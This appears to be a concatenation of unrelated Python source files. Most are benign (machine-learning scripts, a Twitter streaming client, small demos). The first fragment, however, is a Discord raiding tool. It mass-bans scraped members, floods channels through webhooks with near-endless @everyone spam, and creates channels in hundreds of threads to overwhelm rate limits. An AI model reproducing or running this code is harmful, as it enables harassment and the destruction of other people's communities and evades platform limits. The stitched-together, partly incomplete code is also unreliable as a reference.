def Chook(channel):
try:
json = {'name': choice(webname)}
r = session.post(f"https://canary.discord.com/api/v{randint(7,9)}/channels/{channel}/webhooks", headers=headers, json=json)
wid = r.json()['id']
wtoken = r.json('token')
return f"https://canary.discord.com/api/webhooks/{wid}/{wtoken}"
except:
pass
def Shook(hook):
try:
for _ in range(9999999):
payload = {'username': choice(webname), 'content': f"@everyone test"}
session.post(hook, json=payload)
except:
pass
def Cchannel(guild):
try:
json = {'name': choice(cname), 'type': 0}
r = session.post(f'https://discord.com/api/v{randint(6,8)}/guilds/{guild}/channels', headers=headers, json=json).result()
if r.status_code == 429:
ts = []
for i in range(100, 999):
t = Thread(target=Cchannel, args=(guild, ))
t.start()
ts.append(t)
for t in ts:
t.join()
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{s}[{m}STATUS{s}] {m}created channel {s}| {m}{json['id']}{s}")
#not going to work because it isn't done
#try:
# hook = pix.Chook(r.json['id'])
# ts = []
# for i in range(100, 999):
# t = Thread(target=Shook, args=(hook, ))
# t.start()
# ts.append(t)
# for t in ts:
# t.join()
#except:
# pass
except:
pass
def ui():
print(f'''
{s}┌─┐ ┬ ─┐ ┬
{f}└─┐ │ ┌┴┬┘
{m}└─┘ ┴ ┴ └─
{s}[{m}1{s}] {m}Mass Banner {s}| [{m}2{s}] {m}Webhook Spammer{s}
{s}[{m}3{s}] {m}Scraper {s}| [{m}4{s}] {m}Empty{s}
''')
def ui2():
print(f'''
{s}┌─┐ ┬ ─┐ ┬
{f}└─┐ │ ┌┴┬┘
{m}└─┘ ┴ ┴ └─
{s}[ {m}! {s}] {m}Incorrect Token{s}
''')
async def menu():
ui()
while True:
cmd = input(f"{s}[{m}STATUS{s}] {m}Choice{s}:{m} ")
if cmd == "1":
guild = input(f"{s}[{m}STATUS{s}] {m}Serverid{s}:{m} ")
members = open('scraped.txt').readlines()
print(f"{s}[{m}STATUS{s}] [ {m}{len(members)}{s} ] {m}users ready to ban for {s}[ {m}{guild} {s}]")
sleep(3)
clear()
ui()
ts = []
for _ in range(100, 999):
for member in members:
t = Thread(target=ban, args=(guild, member,))
t.start()
ts.append(t)
for t in ts:
t.join()
elif cmd == "2":
guild = input(f"{s}[{m}STATUS{s}] {m}Serverid{s}:{m} ")
clear()
ui()
ts = []
for i in range(100, 999):
t = Thread(target=Cchannel, args=(guild, ))
t.start()
ts.append(t)
for t in ts:
t.join()
elif cmd == "3":
await scrape()
def login():
try:
client.run(Token)
except:
ui2()
sleep(5)
if __name__ == "__main__":
login()
|
#!/usr/bin/env python
# coding: utf8
"""Download metadata from the DBLP archive.
Usage
-----
```
$ python scripts/parse_dblp.py proceedings.json
```
"""
import argparse
import logging
import json
import os
import pandas as pd
import sys
import time
import tqdm
import zen.models
def parse_one(rec):
pass
def parse_csv(fname, encoding='utf-16'):
df = pd.read_csv(fname, encoding=encoding, index_col=0)
return df.apply(parse_one, axis=1)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__)
# Inputs
parser.add_argument("csv_file",
metavar="csv_file", type=str,
help="Path to a CSV file of submissions.")
parser.add_argument("output_file",
metavar="output_file", type=str,
help="Path to write the output metadata as JSON.")
parser.add_argument("--num_cpus",
metavar="num_cpus", type=int, default=-2,
help="Number of CPUs to use in parallel.")
parser.add_argument("--verbose",
metavar="verbose", type=int, default=0,
help="Verbosity level for joblib.")
parser.add_argument("--resume",
action='store_true',
help="If given, will resume")
parser.add_argument("--delay",
type=float, default=0.5,
help="Delay time in seconds between XML requests.")
args = parser.parse_args()
success = main(args.output_file, args.num_cpus, args.verbose,
args.resume, args.delay)
logging.info("Complete scrape: success={}".format(success))
sys.exit(0 if success else 1)
|
#date and time
import datetime
current_date=datetime.date.today()
print(current_date)
print(current_date.month)
print(current_date.year)
print("Current date is: "+str(current_date.day))
|
import numpy as np
# # Problem domain definition
# # *******************************************************
# state = [0, 1, 2, 3, 4]
# action = [0, 1, 2], representing moving left, staying, moving right respectively
# Transition probability
T = np.array([ [[1/2,1/2,0,0,0], [1/2,1/2,0,0,0], [2/3,1/3,0,0,0]], [[1/3,2/3,0,0,0], [1/4,1/2,1/4,0,0], [0,2/3,1/3,0,0]], [[0,1/3,2/3,0,0], [0,1/4,1/2,1/4,0], [0,0,2/3,1/3,0]], [[0,0,1/3,2/3,0], [0,0,1/4,1/2,1/4], [0,0,0,2/3,1/3]], [[0,0,0,1/3,2/3], [0,0,0,1/2,1/2], [0,0,0,1/2,1/2]], ])
# Number of actions/transitions
num_state = 5
num_action = 3
# Learning rate
r = 1/2
# Reward
R = np.zeros(5)
R[4] = 1
# # *******************************************************
# Initialization
V = np.zeros(5)
num_iter = 100
# Run the V-Q iterations
for i in range(num_iter):
Q = [[sum([T[s][a][t] * (R[s] + r * V[t]) for t in range(num_state)]) for a in range(num_action)] for s in range(num_state)]
V = np.max(Q, axis=1)
print(V) |
"""Disaster Tweet Classification, Helpers
This module provides helper functions, to be used for the naive Bayes algorithm of main.py. The
purposes of the helper functions relate to reading files, checking render, dividing original
training set into two sets, and tokenizing and normalizing the text data.
They are not meant for standalone purposes.
Copyright (c) 2021 Akshat Naik.
Licensed under the MIT License. See LICENSE in the project root for license information.
"""
import csv, re, random
from pprint import pprint as pp
from typing import Iterable
def get_dataset(filename: str) -> list[list[str]]:
"""Returns the dataset of the filename, rendered using csv, where filename takes four possible
parameters: 'train', 'new_train', 'dev' or 'test'
"""
if filename in ('train', 'test'):
filename = f'nlp-getting-started/{filename}.csv'
elif filename in ('new_train', 'dev'):
filename = f'data/{filename}.csv'
else:
raise ValueError('Incorrect value passed to filename parameter.')
with open(filename, 'r', encoding='utf-8', newline='') as csvfile:
tweetsreader = csv.reader(csvfile)
next(tweetsreader)
return list(tweetsreader)
def check_render(dataset: list[list[str]], is_test: bool) -> bool:
"""Returns whether the dataset has been rendered correctly by the csv module."""
for line in dataset:
if not is_test: # if it is a training dataset, then target is also there
id, keyword, location, text, target = line
else:
id, keyword, location, text = line
if not(re.fullmatch('[0-9]+', id) is not None and text != ''):
print(line)
return False
elif not is_test and target not in ('0', '1'):
print(line)
return False
return True
def divide_train_set() -> None:
"""Divides the original training set into a new training set and a development set."""
random.seed(1926) # for reproducibility
# divides the original set into a new training set and a development set
original_train_set = get_dataset('train')
n_dev_set = len(original_train_set) // 10
dev_set = random.sample(original_train_set, k=n_dev_set)
new_train_set = []
for line in original_train_set:
if line not in dev_set:
new_train_set.append(line)
# writes the new sets to their respective new files
with open('data/new_train.csv', 'w', encoding='utf-8', newline='') as csvfile:
new_train_writer = csv.writer(csvfile)
new_train_writer.writerow(['id', 'keyword', 'location', 'text', 'target'])
new_train_writer.writerows(new_train_set)
with open('data/dev.csv', 'w', encoding='utf-8', newline='') as csvfile:
dev_writer = csv.writer(csvfile)
dev_writer.writerow(['id', 'keyword', 'location', 'text', 'target'])
dev_writer.writerows(dev_set)
def process_tweets(text: str) -> list[str]:
"""Returns a list of tokens from the text of the tweet after normalizing and tokenizing the
text of the tweet.
"""
text = text.lower()
# Remove urls
text = re.sub(r'http\S+|www\S+', '', text)
# Remove user @ references and # from tweet
text = re.sub(r'\@\w+|\#', '', text)
# Remove punctuations that occur either start of the string or end-of-word
# and "words" that contain only numbers and punctuations (like dates or time),
# and condense all whitespaces to one whitespace
text = re.sub(r'^[^A-Za-z]+|\b[^A-Za-z]+', '', text)
# Tokenize by splitting by whitespaces
list_of_words = text.split()
return list_of_words
def get_vocab(dataset: list[list[str]]) -> set[str]:
"""Returns a set of words that are found in the text field of the dataset."""
vocab = set()
for line in dataset:
text = line[3]
words = process_tweets(text)
vocab.update(words)
return vocab
def divide_dataset_targets(dataset: list[list[str]]) -> (list[list[str]], list[list[str]]):
"""Return two datasets, one with only 0 as the target and one with only 1 as the target in the
text field of the dataset.
"""
data_0 = []
data_1 = []
for line in dataset:
if line[-1] == '0':
data_0.append(line)
elif line[-1] == '1':
data_1.append(line)
else:
raise ValueError('The value of the target is neither 0 nor 1')
return data_0, data_1
if __name__ == "__main__":
train = get_dataset('train')
test = get_dataset('test')
# divide_train_set()
new_train = get_dataset('new_train')
dev = get_dataset('dev')
assert len(new_train) + len(dev) == len(train)
for i in (train, new_train, dev):
print(check_render(i, False))
print(check_render(test, True))
|
try:
import urllib.request as urllib_request
import urllib.error as urllib_error
import io
except ImportError:
import urllib2 as urllib_request
import urllib2 as urllib_error
import json
from ssl import SSLError
import socket
import sys, select, time
from .api import TwitterCall, wrap_response, TwitterHTTPError
def recv_chunk(sock): # -> bytearray:
buf = sock.recv(8) # Scan for an up to 16MiB chunk size (0xffffff).
crlf = buf.find(b'\r\n') # Find the HTTP chunk size.
if crlf > 0: # If there is a length, then process it
remaining = int(buf[:crlf], 16) # Decode the chunk size.
start = crlf + 2 # Add in the length of the header's CRLF pair.
end = len(buf) - start
chunk = bytearray(remaining)
if remaining <= 2: # E.g. an HTTP chunk with just a keep-alive delimiter or end of stream (0).
chunk[:remaining] = buf[start:start + remaining]
# There are several edge cases (remaining == [3-6]) as the chunk size exceeds the length
# of the initial read of 8 bytes. With Twitter, these do not, in practice, occur. The
# shortest JSON message starts with '{"limit":{'. Hence, it exceeds in size the edge cases
# and eliminates the need to address them.
else: # There is more to read in the chunk.
chunk[:end] = buf[start:]
chunk[end:] = sock.recv(remaining - end)
sock.recv(2) # Read the trailing CRLF pair. Throw it away.
return chunk
return bytearray()
## recv_chunk()
class TwitterJSONIter(object):
def __init__(self, handle, uri, arg_data, block=True, timeout=None):
self.handle = handle
self.uri = uri
self.arg_data = arg_data
self.block = block
self.timeout = timeout
def __iter__(self):
sock = self.handle.fp.raw._sock if sys.version_info >= (3, 0) else self.handle.fp._sock.fp._sock
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
sock.setblocking(self.block and not self.timeout)
buf = ''
json_decoder = json.JSONDecoder()
timer = time.time()
while True:
try:
buf = buf.lstrip()
res, ptr = json_decoder.raw_decode(buf)
buf = buf[ptr:]
yield wrap_response(res, self.handle.headers)
timer = time.time()
continue
except ValueError as e:
if self.block: pass
else: yield None
try:
buf = buf.lstrip() # Remove any keep-alive delimiters to detect hangups.
if self.timeout:
ready_to_read = select.select([sock], [], [], self.timeout)
if ready_to_read[0]:
buf += recv_chunk(sock).decode('utf-8') # This is a non-blocking read.
if time.time() - timer > self.timeout:
yield {'timeout': True}
else: yield {'timeout': True}
else:
buf += recv_chunk(sock).decode('utf-8')
if not buf and self.block:
yield {'hangup': True}
break
except SSLError as e:
# Error from a non-blocking read of an empty buffer.
if (not self.block or self.timeout) and (e.errno == 2): pass
else: raise
def handle_stream_response(req, uri, arg_data, block, timeout=None):
try:
handle = urllib_request.urlopen(req,)
except urllib_error.HTTPError as e:
raise TwitterHTTPError(e, uri, 'json', arg_data)
return iter(TwitterJSONIter(handle, uri, arg_data, block, timeout=timeout))
class TwitterStreamCallWithTimeout(TwitterCall):
def _handle_response(self, req, uri, arg_data, _timeout=None):
return handle_stream_response(req, uri, arg_data, block=True, timeout=self.timeout)
class TwitterStreamCall(TwitterCall):
def _handle_response(self, req, uri, arg_data, _timeout=None):
return handle_stream_response(req, uri, arg_data, block=True)
class TwitterStreamCallNonBlocking(TwitterCall):
def _handle_response(self, req, uri, arg_data, _timeout=None):
return handle_stream_response(req, uri, arg_data, block=False)
class TwitterStream(TwitterStreamCall):
"""
The TwitterStream object is an interface to the Twitter Stream API
(stream.twitter.com). This can be used pretty much the same as the
Twitter class except the result of calling a method will be an
iterator that yields objects decoded from the stream. For
example::
twitter_stream = TwitterStream(auth=OAuth(...))
iterator = twitter_stream.statuses.sample()
for tweet in iterator:
...do something with this tweet...
The iterator will yield tweets forever and ever (until the stream
breaks at which point it raises a TwitterHTTPError.)
The `block` parameter controls if the stream is blocking. Default
is blocking (True). When set to False, the iterator will
occasionally yield None when there is no available message.
"""
def __init__(
self, domain="stream.twitter.com", secure=True, auth=None,
api_version='1.1', block=True, timeout=None):
uriparts = ()
uriparts += (str(api_version),)
if block:
if timeout:
call_cls = TwitterStreamCallWithTimeout
else:
call_cls = TwitterStreamCall
else:
call_cls = TwitterStreamCallNonBlocking
TwitterStreamCall.__init__(
self, auth=auth, format="json", domain=domain,
callable_cls=call_cls,
secure=secure, uriparts=uriparts, timeout=timeout, gzip=False)
|
import math
def math_pow_test(x, y):
return math.pow(x, y)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import warnings
warnings.filterwarnings('ignore')
__tool_name__='STREAM'
print('''
_____ _______ _____ ______ __ __
/ ____|__ __| __ \| ____| /\ | \/ |
| (___ | | | |__) | |__ / \ | \ / |
\___ \ | | | _ /| __| / /\ \ | |\/| |
____) | | | | | \ \| |____ / ____ \| | | |
|_____/ |_| |_| \_\______/_/ \_\_| |_|
FeatureSelection...
''',flush=True)
import stream as st
import argparse
import multiprocessing
import os
from slugify import slugify
import networkx as nx
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib as mpl
import sys
mpl.use('Agg')
mpl.rc('pdf', fonttype=42)
os.environ['KMP_DUPLICATE_LIB_OK']='True'
print('- STREAM Single-cell Trajectory Reconstruction And Mapping -',flush=True)
print('Version %s\n' % st.__version__,flush=True)
print('sys.argv is', sys.argv)
def main():
sns.set_style('white')
sns.set_context('poster')
parser = argparse.ArgumentParser(description='%s Parameters' % __tool_name__ ,formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-m", "--data-file", dest="input_filename",default = None, help="input file name, pkl format from Stream preprocessing module", metavar="FILE")
parser.add_argument("--flag_useprecomputed",dest="flag_useprecomputed", action="store_true", help="use precomputed features for PCA")
parser.add_argument("--flag_firstpc",dest="flag_firstpc", action="store_true", help="Use the first principal component")
parser.add_argument("--flag_pca",dest="flag_pca", action="store_true", help="perform PCA")
parser.add_argument("--flag_variable",dest="flag_variable", action="store_true", help="find variable genes")
parser.add_argument("-of","--of",dest="output_filename_prefix", default="StreamiFSOutput", help="output file name prefix")
parser.add_argument("-lf","--loess_fraction",dest="loess_fraction", type=float, default=None, help="loess fraction")
parser.add_argument("-per",dest="percentile", type = int, default=None, help="percent of variable genes to find")
parser.add_argument("-n_g",dest="num_genes", type=int, default=None, help="num genes")
parser.add_argument("-n_j",dest="num_jobs", type=int, default=None, help="num jobs")
parser.add_argument("-feat",dest="feature", default=None, help="feature")
parser.add_argument("-n_pc",dest="num_principal_components", type=int, default=None, help="num principal components")
parser.add_argument("-max_pc",dest="max_principal_components", type=int, default=None, help="max principal components")
parser.add_argument("-fig_width",dest="fig_width", type=int, default=8, help="")
parser.add_argument("-fig_height",dest="fig_height", type=int, default=8, help="")
parser.add_argument("--flag",dest="flag", action="store_true", help="debugging flag")
args = parser.parse_args()
print('Starting feature selection procedure...')
print(args)
workdir = "./"
adata = st.read(file_name=args.input_filename, file_format='pkl', experiment='rna-seq', workdir=workdir)
print('Input: '+ str(adata.obs.shape[0]) + ' cells, ' + str(adata.var.shape[0]) + ' genes')
#print('N_genes is ' + str(args.num_genes))
if (args.flag_variable):
st.select_variable_genes(adata,loess_frac=args.loess_fraction,percentile=args.percentile,n_genes=args.num_genes,n_jobs=args.num_jobs, save_fig=True, fig_name=(args.output_filename_prefix + '_variable_genes.png'), fig_size=(args.fig_width,args.fig_height ), fig_path="./")
if (args.flag_pca):
st.select_top_principal_components(adata, feature=args.feature,n_pc=args.num_principal_components,max_pc=args.max_principal_components,first_pc=args.flag_firstpc,use_precomputed=args.flag_useprecomputed, save_fig=True, fig_name=(args.output_filename_prefix + '_pca.png'), fig_size=(args.fig_width,args.fig_height ), fig_path='./')
st.write(adata,file_name=(args.output_filename_prefix + '_stream_result.pkl'),file_path='./',file_format='pkl')
print('Output: '+ str(adata.obs.shape[0]) + ' cells, ' + str(adata.var.shape[0]) + ' genes')
print('Finished computation.')
if __name__ == "__main__":
main()
|
from datetime import datetime
from getCryptocurrencyRate import CryptoCurrencyRate
product = "BTC_JPY"
# ["BTC_JPY", "XRP_JPY", "ETH_JPY", "XTZ_JPY", "XLM_JPY", "XEM_JPY", "BAT_JPY", "ETC_JPY", "LTC_JPY", "BCH_JPY", "MONA_JPY", "LSK_JPY"]
scale = "hour"
# ["hour","day","week","month","year"]
res = CryptoCurrencyRate(product, scale).get()
print("\n***情報***")
print("リクエストステータス " + str(res.status))
print("現在 " + res.price_info_list[-1].price_str + "JPY")
print("推移 " + res.change_str + "%")
print("\n***一覧***")
for price_info in res.price_info_list:
print(datetime.fromtimestamp(price_info.timestamp))
print(price_info.price_str + "JPY")
|
"""
Am examplar script showing inference on the newly collected images in U3DPW.
"""
import sys
sys.path.append("../")
import libs.model.model as libm
from libs.dataset.h36m.data_utils import unNormalizeData
import torch
import numpy as np
import imageio
import matplotlib.pyplot as plt
import time
num_joints = 16
gt_3d = False
pose_connection = [[0,1], [1,2], [2,3], [0,4], [4,5], [5,6], [0,7], [7,8],
[8,9], [9,10], [8,11], [11,12], [12,13], [8, 14], [14, 15], [15,16]]
# 16 out of 17 key-points are used as inputs in this examplar model
re_order_indices= [0, 1, 2, 3, 4, 5, 6, 7, 8, 10, 11, 12, 13, 14, 15, 16]
# paths
data_dic_path = './example_annot.npy'
model_path = './example_model.th'
stats = np.load('./stats.npy', allow_pickle=True).item()
dim_used_2d = stats['dim_use_2d']
mean_2d = stats['mean_2d']
std_2d = stats['std_2d']
# load the checkpoint and statistics
ckpt = torch.load(model_path)
data_dic = np.load(data_dic_path, allow_pickle=True).item()
# initialize the model
cascade = libm.get_cascade()
input_size = 32
output_size = 48
for stage_id in range(2):
# initialize a single deep learner
stage_model = libm.get_model(stage_id + 1,
refine_3d=False,
norm_twoD=False,
num_blocks=2,
input_size=input_size,
output_size=output_size,
linear_size=1024,
dropout=0.5,
leaky=False)
cascade.append(stage_model)
cascade.load_state_dict(ckpt)
cascade.eval()
# process and show total_to_show examples
count = 0
total_to_show = 10
def draw_skeleton(ax, skeleton, gt, add_index=True):
# draw the 2-d skeleton
for i in range(len(skeleton)):
if gt:
ax.plot(skeleton[i,0], skeleton[i,1], 'o', color='b')
else:
ax.plot(skeleton[i,0], skeleton[i,1], 'o', color='r')
for segment_idx in range(len(pose_connection)):
point1_idx = pose_connection[segment_idx][0]
point2_idx = pose_connection[segment_idx][1]
point1 = skeleton[point1_idx]
point2 = skeleton[point2_idx]
color = 'k' if gt else 'r'
plt.plot([int(point1[0]),int(point2[0])],
[int(point1[1]),int(point2[1])],
c=color,
linewidth=2)
if add_index:
for (idx, re_order_idx) in enumerate(re_order_indices):
plt.text(skeleton[re_order_idx][0],
skeleton[re_order_idx][1],
str(idx+1),
color='b'
)
return
def normalize(skeleton, re_order=None):
norm_skel = skeleton.copy()
if re_order is not None:
norm_skel = norm_skel[re_order].reshape(32)
norm_skel = norm_skel.reshape(16, 2)
mean_x = np.mean(norm_skel[:,0])
std_x = np.std(norm_skel[:,0])
mean_y = np.mean(norm_skel[:,1])
std_y = np.std(norm_skel[:,1])
denominator = (0.5*(std_x + std_y))
norm_skel[:,0] = (norm_skel[:,0] - mean_x)/denominator
norm_skel[:,1] = (norm_skel[:,1] - mean_y)/denominator
norm_skel = norm_skel.reshape(32)
return norm_skel
def get_pred(cascade, data):
"""
Get prediction from a cascaded model
"""
# forward pass to get prediction for the first stage
num_stages = len(cascade)
# for legacy code that does not have the num_blocks attribute
for i in range(len(cascade)):
cascade[i].num_blocks = len(cascade[i].res_blocks)
prediction = cascade[0](data)
# prediction for later stages
for stage_idx in range(1, num_stages):
prediction += cascade[stage_idx](data)
return prediction
def show3Dpose(channels,
ax,
lcolor="#3498db",
rcolor="#e74c3c",
add_labels=True,
gt=False,
pred=False
):
vals = np.reshape( channels, (32, -1) )
I = np.array([1,2,3,1,7,8,1, 13,14,15,14,18,19,14,26,27])-1 # start points
J = np.array([2,3,4,7,8,9,13,14,15,16,18,19,20,26,27,28])-1 # end points
LR = np.array([1,1,1,0,0,0,0, 0, 0, 0, 0, 0, 0, 1, 1, 1], dtype=bool)
# Make connection matrix
for i in np.arange( len(I) ):
x, y, z = [np.array( [vals[I[i], j], vals[J[i], j]] ) for j in range(3)]
if gt or pred:
color = 'k' if gt else 'r'
ax.plot(x,y, z, lw=2, c=color)
else:
ax.plot(x,y, z, lw=2, c=lcolor if LR[i] else rcolor)
RADIUS = 750 # space around the subject
xroot, yroot, zroot = vals[0,0], vals[0,1], vals[0,2]
ax.set_xlim3d([-RADIUS+xroot, RADIUS+xroot])
ax.set_zlim3d([-RADIUS+zroot, RADIUS+zroot])
ax.set_ylim3d([-RADIUS+yroot, RADIUS+yroot])
if add_labels:
ax.set_xlabel("x")
ax.set_ylabel("z")
ax.set_zlabel("y")
ax.set_aspect('auto')
# Get rid of the panes (actually, make them white)
white = (1.0, 1.0, 1.0, 0.0)
ax.w_xaxis.set_pane_color(white)
ax.w_yaxis.set_pane_color(white)
# Get rid of the lines in 3d
ax.w_xaxis.line.set_color(white)
ax.w_yaxis.line.set_color(white)
ax.w_zaxis.line.set_color(white)
ax.invert_zaxis()
return
def re_order(skeleton):
skeleton = skeleton.copy().reshape(-1,3)
# permute the order of x,y,z axis
skeleton[:,[0,1,2]] = skeleton[:, [0,2,1]]
return skeleton.reshape(96)
def plot_3d_ax(ax,
elev,
azim,
pred,
title=None
):
ax.view_init(elev=elev, azim=azim)
show3Dpose(re_order(pred), ax)
plt.title(title)
return
def adjust_figure(left = 0,
right = 1,
bottom = 0.01,
top = 0.95,
wspace = 0,
hspace = 0.4
):
plt.subplots_adjust(left, bottom, right, top, wspace, hspace)
return
for image_name in data_dic.keys():
print("0. ", end= " -> ")
image_path = './imgs/' + image_name
print("1.", image_path, end= " -> ")
img = imageio.imread(image_path)
print("2.", img.shape, end= " -> ")
f = plt.figure(figsize=(9, 3))
print("3.", end= " -> ")
ax1 = plt.subplot(131)
print("4.", end= " -> ")
ax1.imshow(img)
plt.title('Input image')
ax2 = plt.subplot(132)
plt.title('2D key-point inputs: {:d}*2'.format(num_joints))
ax2.set_aspect('auto')
ax2.invert_yaxis()
skeleton_pred = None
skeleton_2d = data_dic[image_name]['p2d']
# The order for the 2D keypoints is:
# 'Hip', 'RHip', 'RKnee', 'RFoot', 'LHip', 'LKnee', 'LFoot', 'Spine',
# 'Thorax', 'Neck/Nose', 'Head', 'LShoulder', 'LElbow', 'LWrist', 'RShoulder'
# 'RElbow', 'RWrist'
print("5. Draw 2D keypoints", end= " -> ")
draw_skeleton(ax2, skeleton_2d, True)
plt.plot(skeleton_2d[:,0], skeleton_2d[:,1], 'ro', 2)
# Nose was not used for this examplar model
norm_ske_gt = normalize(skeleton_2d, re_order_indices).reshape(1,-1)
pred = get_pred(cascade, torch.from_numpy(norm_ske_gt.astype(np.float32)))
pred = unNormalizeData(pred.data.numpy(),
stats['mean_3d'],
stats['std_3d'],
stats['dim_ignore_3d']
)
ax3 = plt.subplot(133, projection='3d')
print("6. Draw 3D keypoints")
plot_3d_ax(ax=ax3,
pred=pred,
elev=10.,
azim=-90,
title='3D prediction'
)
adjust_figure(left = 0.05,
right = 0.95,
bottom = 0.08,
top = 0.92,
wspace = 0.3,
hspace = 0.3
)
print(count)
time.sleep(0.5)
count += 1
if count >= total_to_show:
break |
# Copyright (c) 2020 Jason Dsouza <jasmcaus@gmail.com>
# Protected under the MIT License (see LICENSE)
# Surpressing Tensorflow Warnings
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# 0 = all messages are logged (default behavior)
# 1 = INFO messages are not printed
# 2 = INFO and WARNING messages are not printed
# 3 = INFO, WARNING, and ERROR messages are not printed
# Importing the necessary packages
from tensorflow.keras.preprocessing.image import ImageDataGenerator as imgdatgen
def imageDataGenerator():
"""
We are not adding a 'rescale' attribute because the data has already been normalized using the 'normalize' function of this class
Returns datagen
"""
datagen = imgdatgen(rotation_range=10,
width_shift_range=.1,
height_shift_range=.1,
shear_range=.2,
zoom_range=.2,
horizontal_flip=True,
fill_mode='nearest')
# We do not augment the validation data
# val_datagen = ImageDataGenerator()
# return train_datagen, val_datagen
return datagen |
import mmapi;
def vectori_to_list(vi):
"""convert a SWIG vectori object to a Python list"""
sz = vi.size()
lst = []
for i in xrange(0,sz):
lst.append( vi[i] )
return lst
def vectorub_to_string(vub):
"""convert a SWIG vectorub object to a Python string"""
sz = vub.size()
lst = []
for i in xrange(0,sz-1): # skip trailing null
lst.append( vub[i] )
return str(bytearray(lst));
def to_vec3f(vec):
p = mmapi.vec3f()
p.x = vec[0]
p.y = vec[1]
p.z = vec[2]
return p
def to_vec3i(vec):
p = mmapi.vec3i()
p.i = vec[0]
p.j = vec[1]
p.k = vec[2]
return p
def to_mat3f(m_in):
"""convert 9-tuple to mmapi.mat3f"""
m = mmapi.mat3f()
for i in xrange(0,9):
m.m[i] = m_in[i]
return m
def to_world_xyz(remote, x,y,z):
"""convert a 3D point from Scene space to World space"""
vScene = mmapi.floatArray(3)
vScene[0] = x
vScene[1] = y
vScene[2] = z
cmd2 = mmapi.StoredCommands()
ckey = cmd2.AppendQueryCommand_ConvertPointToWorld(vScene)
remote.runCommand(cmd2);
vWorld = mmapi.floatArray(3)
cmd2.GetQueryResult_ConvertPointToWorld(ckey, vWorld)
return (vWorld[0],vWorld[1],vWorld[2])
def to_world_f(remote, f):
"""convert a scalar dimension from Scene space to World space"""
cmd2 = mmapi.StoredCommands()
ckey = cmd2.AppendQueryCommand_ConvertScalarToWorld(f)
remote.runCommand(cmd2);
vWorld = mmapi.floatArray(1)
cmd2.GetQueryResult_ConvertScalarToWorld(ckey, vWorld)
return vWorld[0]
def to_world(remote, v):
"""convert input from Scene space to World space (dimension or 3D point)"""
if ( isinstance(v,float) ):
return to_world_f(remote, v)
else:
return to_world_xyz(remote, v[0],v[1],v[2])
def toW(remote, v):
"""same as to_world(), but shorter"""
return to_world(remote,v)
def to_scene_xyz(remote, x,y,z):
"""convert a 3D point from World space to Scene space"""
vWorld = mmapi.floatArray(3)
vWorld[0] = x
vWorld[1] = y
vWorld[2] = z
cmd2 = mmapi.StoredCommands()
ckey = cmd2.AppendQueryCommand_ConvertPointToScene(vWorld)
remote.runCommand(cmd2);
vScene = mmapi.floatArray(3)
cmd2.GetQueryResult_ConvertPointToScene(ckey, vScene)
return (vScene[0],vScene[1],vScene[2])
def to_scene_f(remote, f):
"""convert a scalar dimension from World space to Scene space"""
cmd2 = mmapi.StoredCommands()
ckey = cmd2.AppendQueryCommand_ConvertScalarToScene(f)
remote.runCommand(cmd2);
vScene = mmapi.floatArray(1)
cmd2.GetQueryResult_ConvertScalarToScene(ckey, vScene)
return vScene[0]
def to_scene(remote, v):
"""convert input from World space to Scene space (dimension or 3D point)"""
if ( isinstance(v,float) ):
return to_scene_f(remote, v)
else:
return to_scene_xyz(remote, v[0],v[1],v[2])
def toS(remote, v):
"""same as to_scene(), but shorter"""
return to_scene(remote,v)
|
#!/usr/bin/env python
"用匿名管道从子进程向父进程发送数据,并将管道描述符封装进文件对象"
import os
import time
def child(pipe_out_int):
"子进程"
sleep_int = 0
while True:
# time.sleep(0.01) # 防止向管道输出端发送的数据流重叠
time.sleep(sleep_int) # 模拟实际工作,让父进程等待
msg_bytes = ('Spam {}\n'.format(sleep_int)).encode() # 管道是二进制字节
os.write(pipe_out_int, msg_bytes) # 发送到父进程
sleep_int += 1
sleep_int %= 5 # 0到4,4到0
def main():
pipe_in_int, pipe_out_int = os.pipe() # 创建两个末端的管道
if os.fork() == 0: # 复制此进程
os.close(pipe_in_int) # 在此关闭输入端
child(pipe_out_int) # 在副本中运行child()
else:
os.close(pipe_out_int) # 在此关闭输出端
pipe_in_fdfile = os.fdopen(pipe_in_int) # 创建文本模式输入文件对象
while True:
msg_bytes = pipe_in_fdfile.readline()[:-1] # 数据发送之前保持阻塞
print('Parent {} got [{}] at {}'.format(
os.getpid(), msg_bytes, time.time()
))
if __name__ == '__main__':
main()
|
from syft.interfaces.keras import actual_keras
def load_data():
return actual_keras.keras.datasets.mnist.load_data() |
from webpie import WPApp, WPHandler, HTTPServer, HTTPSServer
class H(WPHandler):
def redirect1(self, request, relpath, to=None):
return "redirect", 301, {"Location":to}
def redirect2(self, request, relpath, to=None):
print("app: request.path_url:", request.path_url)
self.redirect(to)
WPApp(H).run_server(8888) |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from keras import layers
from keras.utils.generic_utils import register_keras_serializable
from keras.utils.tf_utils import shape_type_conversion
@register_keras_serializable(package='Miss')
class L2Scale(layers.Layer):
"""L2-constrained and scaled layer.
Reference: https://arxiv.org/pdf/1703.09507.pdf
L2-constrained Softmax Loss for Discriminative Face Verification
Rajeev Ranjan, Carlos D. Castillo and Rama Chellappa (2017)
Notes
As mentioned in paper, theoretically good `alpha` can be estimated as `log(p * (C - 2) / (1 - p))` where `p`
is the average softmax probability p for correctly classifying a feature and C is a number of classes.
Usually good `alpha` will be in range [10; 30].
"""
def __init__(self, alpha=20., **kwargs):
super(L2Scale, self).__init__(**kwargs)
self.input_spec = layers.InputSpec(min_ndim=2)
self.supports_masking = True
self._supports_ragged_inputs = True
self.alpha = alpha
@shape_type_conversion
def build(self, input_shape):
if len(input_shape) < 2:
raise ValueError('Shape {} must have rank >= 2'.format(input_shape))
num_channels = input_shape[-1]
if num_channels is None:
raise ValueError('Channel dimension of the inputs should be defined. Found `None`.')
self.input_spec = layers.InputSpec(ndim=len(input_shape), axes={-1: num_channels})
super(L2Scale, self).build(input_shape)
def call(self, inputs, **kwargs):
if isinstance(inputs, tf.RaggedTensor):
normalized = tf.ragged.map_flat_values(tf.math.l2_normalize, inputs, axis=-1)
else:
normalized = tf.math.l2_normalize(inputs, axis=-1)
alpha = tf.cast(self.alpha, inputs.dtype)
return normalized * alpha
@shape_type_conversion
